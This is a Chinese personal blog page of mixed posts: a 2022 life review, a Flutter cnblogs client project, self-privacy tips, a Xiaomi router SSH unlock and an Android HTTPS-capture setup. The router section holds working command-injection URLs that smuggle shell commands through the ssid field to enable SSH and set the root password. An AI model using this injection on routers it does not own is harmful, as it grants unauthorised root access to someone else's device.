分类 随便写写 下的文章

一眨眼的功夫就到了2023,随便写写记录下我的2022。

生活

想想上半年的生活是美好的,因为我在追一个女孩。
在这段时间里,体验了许多以前从没体验过的事情,感受到了现充的快乐。可惜,最后还是没能追到手,也许是我太笨、太木纳了吧。

下半年,过着平平淡淡、日复一日的枯燥生活。唯一让我感到快乐的点就是在家里人的支持下,提了辆新车:星越L。

下半年广州的疫情开始严重,好像都习惯了做核酸。再此期间,被赋黄码一次,被居家隔离了一周。

年末又突然毫无征兆的放开了,然后就中招了,躺了一个星期。

工作

5月份,我从上家公司辞职了。因为我受够了无意义的加班、日报、早会、周会;受够了“狼性文化”;受够了莫名其妙的互联网黑话。

6月份,我尝试开始搞电商卖衣服,结果已失败告终。算是休息了一个月吧,又开始了找工作之旅。

7月份入职现在的公司,平平淡淡没啥好说的,至少不需要加班,没有了日报这些让我恶心的玩意。

技术

技术上今年基本抛弃了 .NET,转向了Flutter及原生APP开发。

今年也把维护了多年的哔哩哔哩UWP给archive了,因为B站API的更新,每天都有一堆的反馈塞到我邮箱,让我感到烦躁。
我也没有精力继续维护下去了,每天下班我就只想躺着刷抖音、刷B站,根本就不想去写代码,干脆直接就停止维护了。

规划了几个项目,最后都没有完成,甚至都没有开始。例如:flutter_dmzj的重构、一个本地的弹幕播放器等等。

在年末倒是成功摸出来一个博客园的Flutter客户端,虽然也不完善就是了。

2023年尽量把2022年的坑给填了吧。

总结

2022,上半年的我算是开心、快乐的;下半年是不开心的,是非常枯燥、无趣的。

2023,希望能有多一点的快乐、多一点的开心、多一点写代码的动力。

最近在摸鱼时看到了一些博客园API文章,就想着摸鱼时写个APP练练手。

现阶段实现了以下功能模块:

  • 博客浏览、评论
  • 新闻浏览
  • 闪存浏览、发布、评论
  • 博问浏览
  • 用户登录

博问暂时只支持浏览,不支持回答提问等操作。

支持iOS、Android平台。

截图

浅色模式:

Light.jpg

深色模式:

Dark.jpg

API

开发前需要先到https://api.cnblogs.com/申请API KEY,申请通过才能使用博客园的API。

输入一下个人信息跟应用信息,提交后等待博客园的审核。通过审核后会收到一封包含ClientId和ClientSecret的邮件。

申请APIKEY.png

博客园API文档上的API不全,有些API需要到Github中查询。

开发

API申请完成就可以愉快的进行开发了。
Flutter版本这次选择了最新的3.3,基于GetX框架+Dio来开发,不得不说GetX一把梭的感觉是真的爽。

目录结构跟GetX框架差不多,按我自己的习惯进行了一些改动:

  • app 一些通用的类及样式
  • services 提供数据存储等服务
  • requests 请求的封装
  • generated 生成的国际化文件,使用 get generate locales生成
  • modules 模块,每个会有两个文件,view及controller
  • widgets 自定义的小组件
  • routes 路由定义
  • models 实体类

个人练手项目就加上了一些以前没用过包跟特性体验一下(如lottie、getx国际化)。

这个项目比较简单,技术上没什么好说的,主要说下博文的展示:

博文展示

博文由于是HTML富文本且有一些复杂样式,把文章内容转为Flutter Widget显示的体验挺差,所以还是使用WebView来展示。

在这里我选择了flutter_inappwebview包,这个包会比官方的webview_flutter功能更加丰富,更新也更频繁。

HTML加载流程如下:

  1. 在assets中添加HTML,预留内容、js、css槽位
  2. 在assets中添加两个css样式,分别对应浅色模式及深色模式;css内容可以从任意文章的Web页面抓取
  3. 在assets中添加JS,编写WebView与APP的交互
  4. 在assets中添加highlight.js,实现代码的高亮
  5. 将js、css填充至HTML,css需要根据APP主题选择
  6. 通过API读取博文内容,并填充到HTML中
  7. 通过webViewController.loadData(data: html)在APP中显示博文

具体实现可以看源代码。实现效果:

博文.jpg

由于项目依赖WebView(文章、登录),所以只支持iOS、Android平台。要支持其他平台也不难,只需要把文章内容转为Flutter Widget显示再更改下登录逻辑即可。

自动打包

使用Github Actions可以很简单的自动完成打包发布的步骤。

关于Github Actions的介绍,可以看下官方文档

在项目创建根目录创建一个.github/workflows,然后创建一个xxxx.yml,写入以下代码。

详细代码见:https://github.com/xiaoyaocz/flutter_cnblogs/blob/master/.github/workflows/publish_release.yml

运行脚本前,需要先到Github项目设置-Secrets-Actions中添加以下字段

CLIENT_ID 博客园API ClientId
CLIENT_SECRET 博客园API ClientSecret
KEYSTORE_BASE64 APK签名文件,转为BASE64
KEY_ALIAS APK签名keyAlias
KEY_PASSWORD APK签名keyPassword
STORE_PASSWORD APK签名storePassword
TOKEN Github Token

Github Token点这里添加,注意需要权限的设置。

secrets.png

设置完成后,当想要打包一个新版本时,只需要提交代码并打上Tag推送至Github,即可自动打包。

总结

这个项目没啥难度且博客园API文档还是比较全面,基本对着API做个UI就行了。

天冷变懒了,有些功能还没有写完,过段时间再慢慢完善了。

项目开源地址:https://github.com/xiaoyaocz/flutter_cnblogs,有兴趣可以到Release中下载安装包体验一下。

今天闲着没事干去社工了下自己,结果有点触目惊心。
输入姓名可以找到我的手机号,而通过手机号就可以知道我的户籍、各大网站账号、学校等等。
现在手机号都是实名的,知道了手机号就相当于知道了你的身份证信息,而手机号却是最容易泄露的,特别是通过那些房产中介平台(在平台注册下,随便看下上面房子就一堆中介打电话骚扰,TMD),一定要保护好自己的手机号。

建议:

  • 注册账号尽量不要填写常用QQ的QQ邮箱
  • 需要填写手机号时尽量用小号(如阿里小号)
  • 不要随意填写身份证信息和上传身份证照片,需要上传身份证照片时记得打上水印
  • 密码尽量复杂,不要重复使用同一密码
  • 在设计软件时,涉及个人信息的数据都需要加密存储(如手机号、真实姓名)
  • 最重要的就是在网上和谐友好的发言,不要让人盯上

1、登录路由器获取stok
即URL里的stok参数
http://miwifi.com/cgi-bin/luci/;stok=xxxxxxxxxxxxxxxxxxxxxxx/web/home#router

2、打开以下URL打开ssh
http://192.168.31.1/cgi-bin/luci/;stok=<STOK>/api/misystem/set_config_iotdev?bssid=Xiaomi&user_id=longdike&ssid=-h%3B%20nvram%20set%20ssh_en%3D1%3B%20nvram%20commit%3B%20sed%20-i%20's%2Fchannel%3D.*%2Fchannel%3D%5C%22debug%5C%22%2Fg'%20%2Fetc%2Finit.d%2Fdropbear%3B%20%2Fetc%2Finit.d%2Fdropbear%20start%3B

返回{"code":0}则成功

3、修改默认密码为admin
http://192.168.31.1/cgi-bin/luci/;stok=<STOK>/api/misystem/set_config_iotdev?bssid=Xiaomi&user_id=longdike&ssid=-h%3B%20echo%20-e%20'admin%5Cnadmin'%20%7C%20passwd%20root%3B

以上方法固件1.0.26测试通过

QQ截图20210129104722.png

MIXBOX:
https://github.com/monlor/MIXBOX-ARCHIVE

旧版固件下载:
http://cdn.cnbj1.fds.api.mi-img.com/xiaoqiang/rom/ra67/miwifi_ra67_firmware_63805_1.0.16.bin

http://cdn.cnbj1.fds.api.mi-img.com/xiaoqiang/rom/ra67/miwifi_ra67_all_f3fac_1.0.26.bin

来源:
https://www.right.com.cn/forum/forum.php?mod=viewthread&tid=4032490&highlight=ax5&mobile=2

Android7.0以上默认不再信任用户证书,我们就无法抓取HTTPS包。

我们需要下面两个工具来使我们能够简单免Root的抓取Https包:

VirtualXposed 是基于VirtualApp 和 epic 在非ROOT环境下运行Xposed模块的实现。

JustTrustMe 是一个Xposed模块,用来信任全部证书。

首先安装VirtualXposed,运行Xposed模块

下载地址:https://github.com/android-hacker/VirtualXposed

VirtualXposed安装完成后下载JustTrustMe

下载地址:https://github.com/Fuzion24/JustTrustMe

将JustTrustMe安装在VirtualXposed中,并启用JustTrustMe模块,再将需要抓包的APP添加到VirtualXposed中

接下来按常规抓包方式,安装证书、设置代理,在VirtualXposed中打开需要抓包的APP就可以正常抓包了